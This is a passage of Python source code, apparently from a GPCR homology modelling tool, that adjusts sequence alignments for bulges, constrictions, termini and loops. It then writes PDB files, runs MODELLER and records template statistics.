aligned_seg_keys): if ref_seg[0]=='T': ref_res_keys = list(a.reference_dict[ref_seg].keys()) temp_res_keys = list(a.template_dict[temp_seg].keys()) aligned_res_keys = list(a.alignment_dict[aligned_seg].keys()) for ref_res, temp_res, aligned_res in zip(ref_res_keys, temp_res_keys, aligned_res_keys): gn = ref_res gn_num = parse.gn_num_extract(gn, 'x')[1] if a.alignment_dict[aligned_seg][aligned_res]=='-': if (a.reference_dict[ref_seg][ref_res]=='-' and a.reference_dict[ref_seg][parse.gn_indecer(gn,'x',-1)] not in ['-','/'] and a.reference_dict[ref_seg][parse.gn_indecer(gn,'x',+1)] not in ['-','/']): # bulge in template if len(str(gn_num))==3: if switch_bulges==True: try: Bulge = Bulges(gn) bulge_template = Bulge.find_bulge_template(self.similarity_table_all, bulge_in_reference=False) l = list(main_pdb_array[temp_seg].keys()) this = l.index(gn.replace('x','.')) bulge_site = OrderedDict([(l[this-2],main_pdb_array[ref_seg][l[this-2]]), (l[this-1],main_pdb_array[ref_seg][l[this-1]]), (l[this],main_pdb_array[ref_seg][l[this]]), (l[this+1],main_pdb_array[ref_seg][l[this+1]]), (l[this+2],main_pdb_array[ref_seg][l[this+2]])]) superpose = sp.BulgeConstrictionSuperpose(bulge_site, bulge_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in bulge_template.items(): if switch_res!=0 and switch_res!=3: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Bulge.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] else: a.alignment_dict[aligned_seg][gn__]='.' switch_res+=1 del main_pdb_array[ref_seg][gn.replace('x','.')] delete_r.add((ref_seg,gn)) delete_t.add((temp_seg,gn)) delete_a.add((aligned_seg,gn)) temp_bulge_list.append({gn:Bulge.template}) except: temp_bulge_list.append({gn:None}) # constriction in reference else: if switch_constrictions==True: try: Const = Constrictions(gn) constriction_template = Const.find_constriction_template( self.similarity_table_all, constriction_in_reference=True) constriction_site = OrderedDict([ (parse.gn_indecer(gn,'x',-2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]), (parse.gn_indecer(gn,'x',-1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]), (gn.replace('x','.'), main_pdb_array[ref_seg][gn.replace('x','.')]), (parse.gn_indecer(gn,'x',+1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]), (parse.gn_indecer(gn,'x',+2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])]) superpose = sp.BulgeConstrictionSuperpose(constriction_site, constriction_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in constriction_template.items(): if switch_res!=0 and switch_res!=3: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Const.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] switch_res+=1 ref_const_list.append({gn:Const.template}) del main_pdb_array[ref_seg][gn.replace('x','.')] delete_r.add((ref_seg,gn)) delete_t.add((temp_seg,gn)) delete_a.add((aligned_seg,gn)) except: ref_const_list.append({gn:None}) elif (a.template_dict[ref_seg][temp_res]=='-' and a.template_dict[temp_seg][parse.gn_indecer(gn,'x',-1)] not in ['-','/'] and a.template_dict[temp_seg][parse.gn_indecer(gn,'x',+1)] not in ['-','/']): # bulge in reference if len(str(gn_num))==3: if switch_bulges==True: try: Bulge = Bulges(gn) bulge_template = Bulge.find_bulge_template(self.similarity_table_all, bulge_in_reference=True) bulge_site = OrderedDict([ (parse.gn_indecer(gn,'x',-2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]), (parse.gn_indecer(gn,'x',-1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]), (parse.gn_indecer(gn,'x',+1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]), (parse.gn_indecer(gn,'x',+2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])]) superpose = sp.BulgeConstrictionSuperpose(bulge_site, bulge_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in bulge_template.items(): if switch_res!=0 and switch_res!=4: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Bulge.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] switch_res+=1 ref_bulge_list.append({gn:Bulge.template}) if a.reference_dict[ref_seg][gn] == a.template_dict[temp_seg][gn]: a.alignment_dict[ref_seg][gn] = a.reference_dict[ref_seg][gn] else: a.alignment_dict[ref_seg][gn] = '.' except: ref_bulge_list.append({gn:None}) # constriction in template else: if switch_constrictions==True: try: Const = Constrictions(gn) constriction_template = Const.find_constriction_template( self.similarity_table_all, constriction_in_reference=False) constriction_site = OrderedDict([ (parse.gn_indecer(gn,'x',-2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]), (parse.gn_indecer(gn,'x',-1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]), (parse.gn_indecer(gn,'x',+1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]), (parse.gn_indecer(gn,'x',+2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])]) superpose = sp.BulgeConstrictionSuperpose(constriction_site, constriction_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in constriction_template.items(): if switch_res!=0 and switch_res!=4: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Const.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] switch_res+=1 temp_const_list.append({gn:Const.template}) if a.reference_dict[ref_seg][gn] == a.template_dict[temp_seg][gn]: a.alignment_dict[ref_seg][gn] = a.reference_dict[ref_seg][gn] else: a.alignment_dict[ref_seg][gn] = '.' except: temp_const_list.append({gn:None}) for i,ii in delete_r: del a.reference_dict[i][ii] for i,ii in delete_t: del a.template_dict[i][ii] for i,ii in delete_a: del a.alignment_dict[i][ii] self.statistics.add_info('reference_bulges', ref_bulge_list) self.statistics.add_info('template_bulges', temp_bulge_list) self.statistics.add_info('reference_constrictions', ref_const_list) self.statistics.add_info('template_constrictions', temp_const_list) # insert bulge to array in the right place if ref_bulge_list!=[]: out_pdb_array = OrderedDict() bulge_gns = [] for bulge in ref_bulge_list: if list(bulge.values())[0]!=None: gn = list(bulge.keys())[0].replace('x','.') bulge_gns.append(gn) for seg_id, residues in main_pdb_array.items(): seg = OrderedDict() for key, value in residues.items(): seg[key] = value if str(key)+'1' in bulge_gns: seg[str(key)+'1'] = main_pdb_array[seg_id][str(key)+'1'] out_pdb_array[seg_id] = seg main_pdb_array = out_pdb_array if temp_const_list!=[]: out_pdb_array = OrderedDict() const_gns = [] for const in temp_const_list: gn_ = list(const.keys())[0].replace('x','.') const_gns.append(gn_) for seg_id, residues in main_pdb_array.items(): seg = OrderedDict() for key, value in residues.items(): seg[key] = value if parse.gn_indecer(key, '.', +1) in const_gns: gn = parse.gn_indecer(key, '.', +1) try: seg[gn] = main_pdb_array[seg_id][gn] except: seg[gn.replace('.','?')] = '-' a.alignment_dict[seg_id][gn.replace('.','?')] = '-' a.reference_dict[seg_id] = OrderedDict([(g.replace('x','?'), v) if g==gn.replace('.','x') else (g, v) for g, v in a.reference_dict[seg_id].items()]) a.template_dict[seg_id] = OrderedDict([(g.replace('x','?'), v) if g==gn.replace('.','x') else (g, v) for g, v in a.template_dict[seg_id].items()]) out_pdb_array[seg_id] = seg main_pdb_array = out_pdb_array if self.debug: print('Integrate bulges/constrictions: ',datetime.now() - startTime) # check for inconsitencies with db pdb_db_inconsistencies = [] for seg_label, segment in a.template_dict.items(): try: for gn, res in segment.items(): try: if (res==PDB.Polypeptide.three_to_one( main_pdb_array[seg_label][gn.replace('x','.')][0].get_parent().get_resname()) and main_pdb_array[seg_label][gn.replace('x','.')][0].get_parent().get_resname()!='YCM'): pass elif 'x' in gn: try: Residue.objects.get( protein_conformation__protein=self.main_structure.protein_conformation.protein, display_generic_number__label=dgn(gn,self.main_structure.protein_conformation)) pdb_db_inconsistencies.append({gn:a.template_dict[seg_label][gn]}) except: pass else: pass except: pass except: pass if pdb_db_inconsistencies!=[]: for incons in pdb_db_inconsistencies: seg = self.segment_coding[int(list(incons.keys())[0][0])] seq_num = Residue.objects.get( protein_conformation__protein=self.main_structure.protein_conformation.protein, display_generic_number__label=dgn(list(incons.keys())[0],self.main_structure.protein_conformation)) temp_segment, temp_array = OrderedDict(), OrderedDict() for key, value in main_pdb_array[seg].items(): if key==str(seq_num.sequence_number): temp_segment[list(incons.keys())[0].replace('x','.')] = value else: temp_segment[key] = value for seg_id, segment in main_pdb_array.items(): if seg_id==seg: temp_array[seg_id] = temp_segment else: temp_array[seg_id] = segment main_pdb_array = temp_array a.template_dict[seg][list(incons.keys())[0]] = PDB.Polypeptide.three_to_one( main_pdb_array[seg][list(incons.keys())[0].replace('x','.')][0].get_parent().get_resname()) if a.reference_dict[seg][list(incons.keys())[0]]==a.template_dict[seg][list(incons.keys())[0]]: a.alignment_dict[seg][list(incons.keys())[0]] = a.reference_dict[seg][list(incons.keys())[0]] else: a.alignment_dict[seg][list(incons.keys())[0]] = '.' for seg in main_pdb_array: for gn, atoms in main_pdb_array[seg].items(): try: if atoms[0].get_parent().get_resname() in ['YCM','CSD']: if self.debug: print(gn, atoms[0].get_parent().get_resname(), atoms[0].get_parent().get_id()) a.alignment_dict[seg][gn.replace('.','x')] = '.' except: pass self.statistics.add_info('pdb_db_inconsistencies', pdb_db_inconsistencies) path = "./structure/homology_models/" if not os.path.exists(path): os.mkdir(path) if self.debug: print('Check inconsistencies: {}'.format(pdb_db_inconsistencies),datetime.now() - startTime) # inserting loops for free modeling for label, template in loop_stat.items(): if template==None: modeling_loops = Loops(self.reference_protein, label, self.similarity_table_all, self.main_structure, self.helix_end_mods, list(self.template_source), self.revise_xtal) modeling_loops.insert_gaps_for_loops_to_arrays(main_pdb_array, a.reference_dict, a.template_dict, a.alignment_dict) main_pdb_array = modeling_loops.main_pdb_array a.reference_dict = modeling_loops.reference_dict a.template_dict = modeling_loops.template_dict a.alignment_dict = modeling_loops.alignment_dict if self.debug: print('Free loops: ',datetime.now() - startTime) # Adjust H8 if needed if 'H8' in main_pdb_array and 'ICL4' not in main_pdb_array and len(self.helix_end_mods['removed']['TM7'][1])>0: unwind_num = math.ceil(len(self.helix_end_mods['removed']['TM7'][1])/2) trimmed_residues+=list(main_pdb_array['TM7'].keys())[(unwind_num*-1):]+list(main_pdb_array['H8'].keys())[:unwind_num] # N- and C-termini if N_and_C_termini==True: #and self.prot_conf.protein==self.main_structure.protein_conformation.protein.parent: N_struct = self.template_source['TM1'][list(self.template_source['TM1'])[0]][0] N_term = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='N-term') if N_struct!=None: N_term_temp = Residue.objects.filter(protein_conformation=N_struct.protein_conformation, protein_segment__slug='N-term') last_five = [i.sequence_number for i in list(N_term_temp) if i.sequence_number<1000] if self.prot_conf.protein!=self.main_structure.protein_conformation.protein.parent: last_five = last_five[-5:] else: last_five = [] if self.main_structure==N_struct: try: temp_coo = list(parse.fetch_residues_from_pdb(N_struct,last_five).values()) except: temp_coo = None elif len(last_five)==5: try: temp_nums = last_five + [i for i in range(last_five[-1]+1,last_five[-1]+5)] template = parse.fetch_residues_from_pdb(N_struct,temp_nums) ref_nums = list(main_pdb_array['TM1'])[:4] reference = OrderedDict() for i in ref_nums: reference[i] = main_pdb_array['TM1'][i] superpose = sp.OneSidedSuperpose(reference,template,4,0) sup_residues = superpose.run() n_count2 = 0 temp_coo = [] for num, atoms in sup_residues.items(): if n_count2<5: temp_coo.append(atoms) n_count2+=1 except: temp_coo = None else: temp_coo = None r_i, t_i, a_i, arr_i = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() N_r, N_t, N_a, N_arr = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() n_count = 0 for n in N_term: n_count+=1 N_r[str(n.sequence_number)] = n.amino_acid N_a[str(n.sequence_number)] = '-' try: N_arr[str(n.sequence_number)] = temp_coo[-1*(len(N_term)-n_count+1)] N_t[str(n.sequence_number)] = list(N_term_temp)[-1*(len(N_term)-n_count+1)].amino_acid self.template_source['N-term'][str(n.sequence_number)][0] = N_struct self.template_source['N-term'][str(n.sequence_number)][1] = N_struct except: N_t[str(n.sequence_number)] = '-' N_arr[str(n.sequence_number)] = '-' r_i['N-term'] = N_r t_i['N-term'] = N_t a_i['N-term'] = N_a arr_i['N-term'] = N_arr for r,t,al,arr in zip(a.reference_dict,a.template_dict,a.alignment_dict,main_pdb_array): r_i[r]=a.reference_dict[r] t_i[t]=a.template_dict[t] a_i[al]=a.alignment_dict[al] arr_i[arr]=main_pdb_array[arr] a.reference_dict = r_i a.template_dict = t_i a.alignment_dict = a_i main_pdb_array = arr_i try: index = -1 while self.template_source['H8'][list(self.template_source['H8'])[index]][0]==None: index-=1 C_struct = self.template_source['H8'][list(self.template_source['H8'])[index]][0] last_seg = 'H8' except: C_struct = self.template_source['TM7'][list(self.template_source['TM7'])[-1]][0] last_seg = 'TM7' C_term = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='C-term') C_term_temp = Residue.objects.filter(protein_conformation=C_struct.protein_conformation, protein_segment__slug='C-term') first_five = [i.sequence_number for i in list(C_term_temp) if i.sequence_number<1000] if self.main_structure==C_struct: try: temp_coo2 = list(parse.fetch_residues_from_pdb(C_struct,first_five).values()) except: temp_coo2 = None elif len(first_five)==5: try: temp_nums2 = [i for i in range(first_five[0]-4,first_five[0])] + first_five template2 = parse.fetch_residues_from_array(C_struct,temp_nums2) ref_nums2 = list(main_pdb_array[last_seg])[-4:] reference2 = OrderedDict() for i in ref_nums2: reference2[i] = main_pdb_array[last_seg][i] superpose2 = sp.OneSidedSuperpose(reference2,template2,4,1) sup_residues2 = superpose2.run() c_count2 = 0 temp_coo2 = [] for num, atoms in sup_residues2.items(): if c_count2<5: temp_coo2.append(atoms) c_count2+=1 except: temp_coo2 = None else: temp_coo2 = None a.reference_dict['C-term'],a.template_dict['C-term'] = OrderedDict(),OrderedDict() a.alignment_dict['C-term'],main_pdb_array['C-term'] = OrderedDict(),OrderedDict() c_count = -1 for c in C_term: c_count+=1 if self.revise_xtal==True and self.main_structure.pdb_code.index=='1GZM': if c.sequence_number in [327,328,329]: continue a.reference_dict['C-term'][str(c.sequence_number)] = c.amino_acid a.alignment_dict['C-term'][str(c.sequence_number)] = '-' try: main_pdb_array['C-term'][str(c.sequence_number)] = temp_coo2[c_count] a.template_dict['C-term'][str(c.sequence_number)] = list(C_term_temp)[c_count].amino_acid self.template_source['C-term'][str(c.sequence_number)][0] = C_struct self.template_source['C-term'][str(c.sequence_number)][1] = C_struct except: a.template_dict['C-term'][str(c.sequence_number)] = '-' main_pdb_array['C-term'][str(c.sequence_number)] = '-' # Shorten N- and C-termini n_count=1 delete_termini = set() for num in list(a.template_dict['N-term'])[:-5]: if a.template_dict['N-term'][num]=='-': delete_termini.add(('N-term', num)) n_count+=1 c_count=1 for num in list(a.template_dict['C-term'])[5:]: if a.template_dict['C-term'][num]=='-': delete_termini.add(('C-term', num)) c_count+=1 for i, ii in delete_termini: del a.reference_dict[i][ii] del a.template_dict[i][ii] del a.alignment_dict[i][ii] del main_pdb_array[i][ii] del self.template_source[i][ii] if len(a.reference_dict['N-term'])==0: del a.reference_dict['N-term'] del a.template_dict['N-term'] del a.alignment_dict['N-term'] del main_pdb_array['N-term'] # Shorten ICL3 for i in a.reference_dict: if i.startswith('ICL3'): label = i break try: if len(a.reference_dict[label])>10: delete_ts, delete_r, delete_t, delete_a, delete_m = set(),set(),set(),set(),set() chain_break = False icl3_c = 0 keys = list(self.template_source['ICL3'].keys()) length = len(a.template_dict[label]) if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein for r_s,t_s,a_s,ar_s in zip(a.reference_dict[label],a.template_dict[label], a.alignment_dict[label],main_pdb_array[label]): icl3_c+=1 if 5<icl3_c<length-4: if self.main_structure.protein_conformation.protein.parent==ref_prot and chain_break==False: a.reference_dict[label][r_s] = '/' a.template_dict[label][t_s] = '/' a.alignment_dict[label][a_s] = '/' main_pdb_array[label][ar_s] = '/' delete_ts.add(('ICL3',keys[icl3_c-1])) chain_break = True else: delete_r.add((label,r_s)) delete_t.add((label,t_s)) delete_a.add((label,a_s)) delete_m.add((label,ar_s)) delete_ts.add(('ICL3',keys[icl3_c-1])) for i,ii in delete_ts: del self.template_source[i][ii] for i,ii in delete_r: del a.reference_dict[i][ii] for i,ii in delete_t: del a.template_dict[i][ii] for i,ii in delete_a: del a.alignment_dict[i][ii] for i,ii in delete_m: del main_pdb_array[i][ii] except: pass # non-conserved residue switching if switch_rotamers==True: non_cons_switch = self.run_non_conserved_switcher(main_pdb_array,a.reference_dict,a.template_dict, a.alignment_dict) main_pdb_array = non_cons_switch[0] a.reference_dict = non_cons_switch[1] a.template_dict = non_cons_switch[2] a.alignment_dict = non_cons_switch[3] trimmed_residues+=non_cons_switch[4] else: for seg_id, seg in main_pdb_array.items(): for key in seg: if a.reference_dict[seg_id][str(key).replace('.','x')]!='-': trimmed_residues.append(key) if 'ICL4_free' in main_pdb_array: freeICL4=True else: freeICL4=False if freeICL4==True: for i in list(main_pdb_array['H8']): if i not in trimmed_residues: trimmed_residues.append(i) array_keys = list(main_pdb_array.keys()) for i,j in self.helix_end_mods['added'].items(): try: if j[0][-1].replace('x','.') not in trimmed_residues: trimmed_residues.append(j[0][-1].replace('x','.')) except: pass try: if j[1][0].replace('x','.') not in trimmed_residues: trimmed_residues.append(j[1][0].replace('x','.')) except: pass try: if j[0][0].replace('x','.') not in trimmed_residues and '_cont' in array_keys[array_keys.index(i)-1]: trimmed_residues.append(j[0][0].replace('x','.')) except: pass try: if j[1][-1].replace('x','.') not in trimmed_residues and array_keys[array_keys.index(i)+1]+'_cont' in array_keys: trimmed_residues.append(j[1][-1].replace('x','.')) except: pass try: trimmed_residues.append(parse.gn_indecer(j[0][-1],'x',1).replace('x','.')) except: pass try: trimmed_residues.append(parse.gn_indecer(j[1][0],'x',-1).replace('x','.')) except: pass for i in ref_bulge_list+temp_bulge_list+ref_const_list+temp_const_list: i = list(i.keys())[0].replace('x','.') if parse.gn_indecer(i,'.',-2) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',-2)) if parse.gn_indecer(i,'.',-1) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',-1)) if parse.gn_indecer(i,'.',1) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',1)) if parse.gn_indecer(i,'.',2) not in trimmed_residues: trimmed_residues.append(parse.gn_indecer(i,'.',2)) for s in a.reference_dict: if 'dis' in s: key_list=list(a.reference_dict[s].keys()) i, j = 0, -1 found_first, found_second = False, False while found_first==False: if a.reference_dict[s][key_list[i]]!='x': found_first=True i+=1 while found_second==False: if a.reference_dict[s][key_list[j]]!='x': trimmed_residues.append(key_list[j].replace('x','.')) found_second=True j-=1 segs = list(a.reference_dict.keys()) if i>0: trimmed_residues.append(list(a.reference_dict[segs[segs.index(s)-1]].keys())[-1].replace('x','.')) if j<-1: trimmed_residues.append(list(a.reference_dict[segs[segs.index(s)+1]].keys())[0].replace('x','.')) if self.reference_entry_name.startswith('taar') and str(self.main_structure)=='4IAR': trimmed_residues.append('5.36') if self.debug: print('Rotamer switching: ',datetime.now() - startTime) for i in model_loops: for j in a.reference_dict[i]: trimmed_residues.append(j.replace('x','.')) if self.reference_protein.family.slug.startswith('004'): for i in a.template_dict['H8']: trimmed_residues.append(i.replace('x','.')) self.statistics.add_info('trimmed_residues', trimmed_residues) # check if ECL3 might have a disulfide bridge self.disulfide_pairs.append(self.ECL3_disulfide(a.reference_dict)) self.statistics.add_info('disulfide_pairs', self.disulfide_pairs) # if complex if self.complex: self.signprot_complex = SignprotComplex.objects.get(structure=self.main_structure) structure_signprot= self.signprot_complex.protein if self.signprot!=False: target_signprot = Protein.objects.get(entry_name=self.signprot) else: target_signprot = self.signprot_complex.protein self.signprot_protconf = ProteinConformation.objects.get(protein=target_signprot) sign_a = GProteinAlignment() sign_a.run_alignment(target_signprot) io = StringIO(self.main_structure.pdb_data.pdb) assign_cgn = as_gn.GenericNumbering(pdb_file=io, pdb_code=self.main_structure.pdb_code.index, sequence_parser=True, signprot=structure_signprot) signprot_pdb_array = assign_cgn.assign_cgn_with_sequence_parser(self.signprot_complex.chain) new_array = OrderedDict() # for seg, values in signprot_pdb_array.items(): # # main_pdb_array[seg] = values # self.template_source[seg] = OrderedDict() # for key in values: # self.template_source[seg][key] = [self.main_structure, self.main_structure] for seg, values in sign_a.reference_dict.items(): new_array[seg] = OrderedDict() self.template_source[seg] = OrderedDict() for key, res in values.items(): try: if signprot_pdb_array[seg][key] == 'x': values[key] = 'x' new_array[seg][key] = 'x' del self.template_source[seg][key] else: if res == '-': new_array[seg][key] = 'x' del self.template_source[seg][key] else: new_array[seg][key] = signprot_pdb_array[seg][key] self.template_source[seg][key] = [self.main_structure, self.main_structure] except: if res!='-': new_array[seg][key] = '-' self.template_source[seg][key] = [None, None] a.reference_dict[seg] = values for seg, values in sign_a.template_dict.items(): for key, res in values.items(): if new_array[seg][key] == 'x': values[key] = 'x' a.template_dict[seg] = values for seg, values in sign_a.alignment_dict.items(): for key, res in values.items(): if new_array[seg][key] == 'x': values[key] = 'x' a.alignment_dict[seg] = values signprot_pdb_array = new_array for seg, values in signprot_pdb_array.items(): main_pdb_array[seg] = values # write to file trimmed_res_nums, helix_restraints, icl3_mid, disulfide_nums = self.write_homology_model_pdb(path+self.reference_entry_name+'_'+self.state+"_post.pdb", main_pdb_array, a, trimmed_residues=trimmed_residues, disulfide_pairs=self.disulfide_pairs) self.statistics.add_info('template_source',self.template_source) # Adding HETATMs when revising xtal hetatm_count = 0 water_count = 0 if self.revise_xtal==True: ref_prot = self.reference_protein.parent else: ref_prot = self.reference_protein if ref_prot==self.main_structure.protein_conformation.protein.parent: pdb = PDB.PDBList() pdb.retrieve_pdb_file(str(self.main_structure), pdir='./', file_format='pdb') self.alternate_water_positions = OrderedDict() with open('./pdb{}.ent'.format(str(self.main_structure).lower()),'r') as f: lines = f.readlines() with open(path+self.reference_entry_name+'_'+self.state+"_post.pdb", 'a') as model: hetatm = 1 for line in lines: if line.startswith('HETATM'): if 'YCM' in line or 'CSD' in line: continue pref_chain = str(self.main_structure.preferred_chain) if len(pref_chain)>1: pref_chain = pref_chain[0] try: pdb_re = re.search('(HETATM[0-9\sA-Z{apo}]{{11}})([A-Z0-9\s]{{3}})\s({pref})([0-9\s]{{4}})'.format(apo="'",pref=pref_chain), line) if pdb_re.group(2)!='HOH': if hetatm!=pdb_re.group(4): hetatm_count+=1 hetatm = pdb_re.group(4) else: if pdb_re.group(1)[-1]==' ' or pdb_re.group(1)[-1]==pref_chain: water_count+=1 elif pdb_re.group(1)[-1] in ['B','C','D']: self.alternate_water_positions[water_count] = line if pdb_re!=None: model.write(line) except: continue model.write('END') # correcting for side chain clashes p = PDB.PDBParser() post_model = p.get_structure('post', path+self.reference_entry_name+'_'+self.state+"_post.pdb")[0] hse = HSExposureCB(post_model, radius=11) clash_pairs = hse.clash_pairs for i in clash_pairs: gn1 = str(i[0][0]).replace('.','x') if len(gn1.split('x')[1])==1: gn1 = gn1+'0' if gn1[0]=='-': gn1 = gn1[1:]+'1' gn2 = str(i[1][0]).replace('.','x') if len(gn2.split('x')[1])==1: gn2 = gn2+'0' if gn2[0]=='-': gn2 = gn2[1:]+'1' first_non_TM, second_non_TM = False, False try: try: segment1 = self.segment_coding[int(gn1.split('x')[0])] for s in a.alignment_dict: if s.startswith(segment1): segment1 = s break except: first_non_TM = True try: segment2 = self.segment_coding[int(gn2.split('x')[0])] for s in a.alignment_dict: if s.startswith(segment2): segment2 = s break except: second_non_TM = True ref_gap_counter = 0 break_loop = False try: start_dif = int(list(a.reference_dict['N-term'].keys())[0])-1 except: start_dif = None if first_non_TM==True or a.alignment_dict[segment1][gn1]=='.': for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn1: trimmed_res_nums[segment1][str(i[0][0])] = i[0][1] break_loop = True break try: if i[0][1]+start_dif+ref_gap_counter==int(gn): trimmed_res_nums[seg][gn] = i[0][1] break_loop = True break except: pass if break_loop==True: break if second_non_TM==True or a.alignment_dict[segment2][gn2]=='.': for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn2: trimmed_res_nums[segment2][str(i[1][0])] = i[1][1] break_loop = True break try: if i[1][1]+start_dif+ref_gap_counter==int(gn): trimmed_res_nums[seg][gn] = i[1][1] break_loop = True break except: pass if break_loop==True: break else: for seg, resis in a.reference_dict.items(): for gn, res in resis.items(): if res=='-': ref_gap_counter+=1 if gn==gn1: trimmed_res_nums[segment1][gn1.replace('x','.')] = i[0][1] elif gn==gn2: trimmed_res_nums[segment2][gn2.replace('x','.')] = i[1][1] except Exception as msg: print("Warning: Can't fix side chain clash on {}".format(msg)) self.statistics.add_info('clashing_residues', clash_pairs) # Check improved sequence identity self.identicals = 0 counter = 0 for r_s, t_s in zip(a.reference_dict, a.template_dict): for r, t in zip(a.reference_dict[r_s], a.template_dict[t_s]): if a.reference_dict[r_s][r]==a.template_dict[t_s][t]: self.identicals+=1 counter+=1 # print(self.state, counter, self.identicals) # Model with MODELLER self.create_PIR_file(a.reference_dict, a.template_dict, path+self.reference_entry_name+'_'+self.state+"_post.pdb", hetatm_count, water_count) self.alignment = a self.main_pdb_array = main_pdb_array if self.revise_xtal==False: modelname = "{}_{}_{}_{}_GPCRdb".format(self.class_name, self.reference_entry_name,self.state,self.main_structure) else: modelname = "{}_{}_{}_refined_{}_GPCRdb".format(self.class_name, self.reference_protein.parent.entry_name, self.main_structure, self.main_structure.state.name) os.remove('./pdb{}.ent'.format(self.reference_entry_name)) # Ignore output from modeller! if not self.debug: _stdout = sys.stdout sys.stdout = open(os.devnull, 'w') self.run_MODELLER("./structure/PIR/"+self.uniprot_id+"_"+self.state+".pir", path+self.reference_entry_name+'_'+self.state+"_post.pdb", self.uniprot_id, self.modeller_iterations, path+modelname+'.pdb', atom_dict=trimmed_res_nums, helix_restraints=helix_restraints, icl3_mid=icl3_mid, disulfide_nums=disulfide_nums) # Resume output if not self.debug: sys.stdout.close() sys.stdout = _stdout if not self.debug: os.remove(path+self.reference_entry_name+'_'+self.state+"_post.pdb") # stat file with open(path+modelname+'.templates.csv','w') as s_file: rot_table = [] sections = [] s_file.write('Segment,Sequence_number,Generic_number,Reference_receptor,Backbone_template,Rotamer_template\n') for seg, resis in self.template_source.items(): list_keys = list(resis) if len(list_keys)==0: continue first_gn = list_keys[0] first_temp = self.template_source[seg][first_gn][0] if 'x' in first_gn: try: first_seqnum = Residue.objects.get(protein_conformation=self.prot_conf,display_generic_number__label=dgn(list_keys[0],self.prot_conf)).sequence_number except: try: first_seqnum = int(list_keys[0]) except: continue elif self.complex and first_gn!=None and len(first_gn.split('.'))==3: first_seqnum = Residue.objects.get(protein_conformation=self.signprot_protconf,display_generic_number__label=list_keys[0]).sequence_number else: first_seqnum = int(first_gn) first_gn = None for gn, res in resis.items(): key = gn if 'x' in gn: seq_num = Residue.objects.get(protein_conformation=self.prot_conf,display_generic_number__label=dgn(gn,self.prot_conf)).sequence_number curr_seqnum = seq_num elif self.complex and first_gn!=None and len(first_gn.split('.'))==3: seq_num = Residue.objects.get(protein_conformation=self.signprot_protconf,display_generic_number__label=gn).sequence_number curr_seqnum = seq_num else: seq_num = int(gn) curr_seqnum = seq_num gn = None rot_table.append([seg,seq_num,gn,ref_prot.entry_name,res[0],res[1]]) seqnum_minus = False if res[0]!=first_temp: if seq_num==first_seqnum: if gn!=None: prev_gn = gn else: prev_gn = None seq_num = int(seq_num) else: if gn!=None: prev_gn = list_keys[list_keys.index(key)-1] else: prev_gn = None seq_num = int(seq_num)-1 seqnum_minus = True sections.append([seg,first_seqnum,seq_num,first_gn,prev_gn,ref_prot.entry_name,first_temp]) if prev_gn==None: first_gn = None else: first_gn = key first_seqnum = curr_seqnum first_temp = res[0] if key==list_keys[-1]: prev_gn = gn if seqnum_minus==True: seq_num = int(seq_num)+1 else: seq_num = int(seq_num) sections.append([seg,first_seqnum,seq_num,first_gn,prev_gn,ref_prot.entry_name,first_temp]) for sec in 